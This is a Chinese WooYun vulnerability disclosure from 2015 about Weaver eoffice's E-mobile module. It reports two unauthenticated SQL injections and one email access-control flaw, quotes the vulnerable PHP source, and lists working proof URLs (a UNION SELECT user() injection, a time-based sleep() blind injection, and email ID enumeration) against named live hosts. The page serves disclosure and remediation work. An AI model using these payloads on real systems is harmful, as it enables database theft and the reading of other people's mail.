当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127270

漏洞标题:泛微eoffice两处sql注入打包+一处越权(无需登录)

相关厂商:泛微eoffice

漏洞作者: 牛肉包子

提交时间:2015-07-22 12:45

修复时间:2015-10-22 14:28

公开时间:2015-10-22 14:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-22: 细节已通知厂商并且等待厂商处理中
2015-07-24: 厂商已经确认,细节仅向厂商公开
2015-07-27: 细节向第三方安全合作伙伴开放
2015-09-17: 细节向核心白帽子及相关领域专家公开
2015-09-27: 细节向普通白帽子公开
2015-10-07: 细节向实习白帽子公开
2015-10-22: 细节向公众公开

简要描述:

rt

详细说明:

看到
E-mobile/calendar_page.php

$mobilekey = $_REQUEST['mobilesessionkey'];
$page = $_REQUEST['page'];
$module = $_REQUEST['module'];
$scope = $_REQUEST['scope'];
$detailid = $_REQUEST['detailid'];
$fromid = $_REQUEST['fromid'];
$sessionstr = $_REQUEST['sessionkey'];
$strexplode = explode( ",", $sessionstr );
$userid = $strexplode[1];
$calid = $detailid;
$UserInfor = array( );
$UserInfor['user_id'] = $userid;
$caleApi = new calendar( $UserInfor );
$cales = $caleApi->getCalendarInfo( "", "", "", $calid );


跟进getCalendarInfo函数

public function getCalendarInfo( $limit = 0, $start = 0, $date = "", $calid = "", $keyword = "", $order = "" )
				{
								global $connection;
								$limit = 0 < $limit ? $limit : $this->default_limit;
								$start = 0 < $start ? $start : $this->default_start;
								$sql = "\r\n\t\t\t\tSELECT * FROM calendar \r\n\t\t\t\t    WHERE 1 \r\n\t\t\t\t    AND (\r\n\t\t\t\t       USER_ID='".$this->userid."' \r\n\t\t\t\t       OR \r\n\t\t\t\t       SHARE_USER LIKE '%,".$this->userid.",%' \r\n\t\t\t\t       OR \r\n\t\t\t\t       LEFT(SHARE_USER,".strlen( $this->userid ).") = '".$this->userid."'\r\n\t\t\t\t)";
								if ( $calid != "" )
								{
												$sql .= " AND CAL_ID=".$calid." "; //注入
								}
								if ( $date != "" )
								{
												$sql .= " AND TO_DAYS(CAL_BEGIN)=TO_DAYS('".$date."')";
								}
								if ( $keyword != "" )
								{
												$sql .= " AND CAL_CONTENT like '%".$keyword."%'";
								}
								if ( $order == "" )
								{
												$sql .= "ORDER BY CAL_BEGIN DESC LIMIT ".$start.",".$limit."";
								}
								else
								{
												$sql .= "ORDER BY ".$order." DESC LIMIT ".$start.",".$limit."";
								}
								$rs = exequery( $connection, $sql );
								$resultArray = array( );
								while ( $row = mysql_fetch_array( $rs ) )
								{
												$calData['USER_ID'] = $row['USER_ID'];
												$calData['CAL_ID'] = $row['CAL_ID'];
												$calData['USER_NAME'] = getusernamenew( $row['USER_ID'] );
												$calData['CAL_CONTENT'] = $row['CAL_CONTENT'];
												$calData['CAL_LEVEL'] = $row['CAL_LEVEL'];
												$calData['CAL_TYPE'] = $row['CAL_TYPE'];
												$calData['CAL_BEGIN'] = $row['CAL_BEGIN'];
												$calData['CAL_END'] = $row['CAL_END'];
												$calData['CAL_WHILE_TYPE'] = $row['CAL_WHILE_TYPE'];
												$calData['CAL_EACH_WHEEL'] = $row['CAL_EACH_WHEEL'];
												$calData['CAL_STR_WEEK'] = $row['CAL_STR_WEEK'];
												array_push( $resultArray, $calData );
								}
								return $resultArray;
				}


注入#2
E-mobile/diarymy_page.php

include_once( "inc/utility_all.php" );
include_once( "inc/conn.php" );
include_once( "api/diary.class.php" );
include_once( "E-mobile/func_all.php" );
$user_id = $_REQUEST['userid'];
$start = $_REQUEST['start'] ? $_REQUEST['start'] : 0;
$Diary = new diary( );
$SearchStr['start'] = $start;
$SearchStr['limit'] = 10;
$diaryinfor = $Diary->MobileShowAllDiary( $user_id, $SearchStr );
$diaryallcount = $Diary->GetMobileAllDiaryCount( $user_id, $SearchStr );
$diarycount = count( $diaryinfor );


跟进MobileShowAllDiary

public function MobileShowAllDiary( $userid, $SearchStr = "" )
				{
								global $connection;
								$info = array( );
								if ( $SearchStr['under'] != "" )
								{
												$user_str = substr( $SearchStr['userstr'], 0, -1 );
												if ( $userid == "admin" )
												{
																$query = "SELECT * FROM diary WHERE USER_ID!='admin' AND USER_ID IN (".$user_str.")";
												}
												else
												{
																$query = "SELECT * FROM diary WHERE USER_ID IN (".$user_str.")";
												}
								}
								else
								{
												$query = "SELECT * FROM diary WHERE USER_ID='".$userid."'";
								}
								if ( $SearchStr['content'] != "" )
								{
												$query .= " AND CONTENT LIKE '%".$value."%'";
								}
								if ( $SearchStr['diff'] == "PuisneDiary" )
								{
												$query .= " AND DIA_TYPE='1'";
								}
								$query .= " ORDER BY DIA_DATE DESC";
								if ( $SearchStr['start'] !== "" )
								{
												$query .= " LIMIT ".$SearchStr['start'].","; //注入
								}
								if ( $SearchStr['limit'] != "" )
								{
												$query .= $SearchStr['limit'];
								}
								$cursor = exequery( $connection, $query );
								$I = 0;
								while ( $ROW = mysql_fetch_array( $cursor ) )
								{
												$info[$I]['diary_id'] = $ROW['DIA_ID'];
												$info[$I]['person_id'] = $ROW['USER_ID'];
												$info[$I]['diary_date'] = $ROW['DIA_DATE'];
												$info[$I]['diary_type'] = $ROW['DIA_TYPE'];
												$info[$I]['diary_content'] = $ROW['CONTENT'];
												$info[$I]['diary_creatdate'] = $ROW['ADD_TIME'];
												$info[$I]['ATTACHMENT_ID'] = $ROW['ATTACHMENT_ID'];
												$info[$I]['ATTACHMENT_NAME'] = $ROW['ATTACHMENT_NAME'];
												$Reply = $ROW['DIA_ID']( $ROW['DIA_ID'] );
												$info[$I]['Reply'] = $Reply;
												++$I;
								}
								return $info;
				}


越权遍历邮件#3
E-mobile/email_page.php

include_once( "api/email.class.php" );
include_once( "inc/conn.php" );
include_once( "inc/utility_all.php" );
include_once( "E-mobile/func_all.php" );
$mobilekey = $_REQUEST['mobilesessionkey'];
$page = $_REQUEST['page'];
$module = $_REQUEST['module'];
$scope = $_REQUEST['scope'];
$detailid = $_REQUEST['detailid'];
$fromid = $_REQUEST['fromid'];
$sessionstr = $_REQUEST['sessionkey'];
$strexplode = explode( ",", $sessionstr );
$userid = $strexplode[1];
$UserInfor = array( );
$UserInfor['user_id'] = $userid;
$emailId = $detailid;
$email = new email( $UserInfor );
$emailInfor = $email->getEmailById( $emailId, "" );


然后emailId可控,跟进getEmailById

public function getEmailById( $id, $box = "" )
				{
								global $connection;
								$sql = " select * from email where email_id = '{$id}' ";
								$cursor = exequery( $connection, $sql );
								$row = mysql_fetch_array( $cursor, MYSQL_ASSOC );
								$inArray = array( $row );
								$inArray = $this->replaceUserStr( "TO_ID", "TO_NAME", $inArray );
								$inArray = $this->replaceUserStr( "TO_ID2", "TO_NAME2", $inArray );
								$inArray = $this->replaceUserStr( "FROM_ID", "FROM_NAME", $inArray );
								if ( $box == "" )
								{
												$this->updateReadflag( $id );
								}
								return $inArray[0];
				}


查询邮件内容

漏洞证明:

http://eoffice8.weaver.cn:8028/E-mobile/calendar_page.php?detailid=-5272 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,user(),NULL,NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL,NULL,NULL--


QQ截图20150716232520.png


http://eoffice8.weaver.cn:8028/E-mobile/diarymy_page.php?start=1,1 procedure analyse((select IF(MID(user(),1,1)=114, sleep(5),1)),1)


QQ截图20150716232658.png


http://219.232.254.131:8082//E-mobile/email_page.php?detailid=7


QQ截图20150716232721.png


http://219.232.254.131:8082//E-mobile/email_page.php?detailid=1


QQ截图20150716232753.png

修复方案:

0.0

版权声明:转载请注明来源 牛肉包子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-24 14:26

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无